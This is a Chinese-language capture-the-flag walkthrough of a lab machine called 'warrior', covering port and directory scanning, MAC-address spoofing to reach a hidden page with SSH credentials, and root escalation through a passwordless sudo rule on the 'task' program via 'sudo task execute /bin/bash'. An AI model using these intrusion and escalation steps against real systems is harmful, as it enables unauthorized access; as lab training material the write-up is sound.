渗透学习

1.扫描端口服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root㉿kali)-[/home/ace]
└─# nmap -sC -sV -p- 192.168.56.137
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-29 11:38 CST
Nmap scan report for 192.168.56.137
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 25168d636b75f05955d4b02d758de0e6 (RSA)
|   256 1e29d0f4c595e740302b35f7a3bc3675 (ECDSA)
|_  256 ccb152b3d7efcd734cfcf6b55177eaf3 (ED25519)
80/tcp open  http    nginx 1.18.0
| http-robots.txt: 7 disallowed entries 
| /admin /secret.txt /uploads/id_rsa /internal.php 
|_/internal /cms /user.txt
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0
MAC Address: 08:00:27:17:EB:28 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.30 seconds

2.访问网页

image-20230729114152533

没啥意义

3.gobuster扫一下目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root㉿kali)-[/home/ace]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.56.137/ -x php,txt,html
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.137/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
2023/07/29 11:42:25 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 31]
/user.txt             (Status: 200) [Size: 5]
/admin                (Status: 301) [Size: 169] [--> http://192.168.56.137/admin/]
/robots.txt           (Status: 200) [Size: 137]
/internal.php         (Status: 200) [Size: 82]
/secret.txt           (Status: 200) [Size: 17]
Progress: 450467 / 882244 (51.06%)^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2023/07/29 11:47:20 Finished
===============================================================

访问一下

image-20230729115029256

image-20230729115116219

image-20230729115144331

image-20230729115545738

4.更改mac

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(root㉿kali)-[/home/ace]
└─# ifconfig eth1 down
                                                                                                                                                  
┌──(root㉿kali)-[/home/ace]
└─# ifconfig eth1 hw ether 00:00:00:00:00:AF
                                                                                                                                                  
┌──(root㉿kali)-[/home/ace]
└─# ifconfig eth1 up                        
                                                                                                                                                  
┌──(root㉿kali)-[/home/ace]
└─# ifconfig        
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.181.139  netmask 255.255.255.0  broadcast 192.168.181.255
        inet6 fe80::20c:29ff:fe4d:2f0b  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:4d:2f:0b  txqueuelen 1000  (Ethernet)
        RX packets 45603  bytes 6896380 (6.5 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 43194  bytes 2636881 (2.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.56.127  netmask 255.255.255.0  broadcast 192.168.56.255
        inet6 fe80::200:ff:fe00:af  prefixlen 64  scopeid 0x20<link>
        ether 00:00:00:00:00:af  txqueuelen 1000  (Ethernet)
        RX packets 561753  bytes 176917710 (168.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 549265  bytes 80914874 (77.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 4  bytes 240 (240.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4  bytes 240 (240.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

再度访问网页:

image-20230729115904388

账号:bro 密码: Zurviv0r1

5.ssh连接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root㉿kali)-[/home/ace]
└─# ssh bro@192.168.56.137   
The authenticity of host '192.168.56.137 (192.168.56.137)' can't be established.
ED25519 key fingerprint is SHA256:LKGaz7vcAZo/hWtEM4N2MzrC3C6Gl5sNO4+P8d7TpV8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.137' (ED25519) to the list of known hosts.
Load key "/root/.ssh/id_rsa": error in libcrypto
bro@192.168.56.137's password: 
Linux warrior 5.10.0-11-amd64 #1 SMP Debian 5.10.92-1 (2022-01-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb  8 04:03:20 2022 from 192.168.1.51
bro@warrior:~$ ls
user.txt
bro@warrior:~$ cat user.txt
LcHHbXGHMVhCpQHvqDen
bro@warrior:~$

6.漏洞提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
bro@warrior:~$ sudo -l
-bash: sudo: command not found
bro@warrior:~$ find / -user root -perm -4000 -print 2>/dev/null
/usr/sbin/sudo
/usr/bin/umount
/usr/bin/chsh
/usr/bin/su
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
bro@warrior:~$

/usr/sbin/sudo可以尝试

1
2
3
4
5
6
bro@warrior:/$ /usr/sbin/sudo -l
Matching Defaults entries for bro on warrior:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bro may run the following commands on warrior:
    (root) NOPASSWD: /usr/bin/task

目标瞄准task:

task可以直接利用

1
2
3
4
5
6
7
8
9
10
11
12
bro@warrior:/$ /usr/sbin/sudo task execute /bin/bash
root@warrior:/# cat root.txt
cat: root.txt: No such file or directory
root@warrior:/# ls
bin   dev  home        initrd.img.old  lib32  libx32      media  opt   root  sbin  sys  usr  vmlinuz
boot  etc  initrd.img  lib             lib64  lost+found  mnt    proc  run   srv   tmp  var  vmlinuz.old
root@warrior:/# cd root
root@warrior:~# ls
root.txt
root@warrior:~# cat root.txt
HPiGHMVcDNLlXbHLydMv
root@warrior:~#

over!!!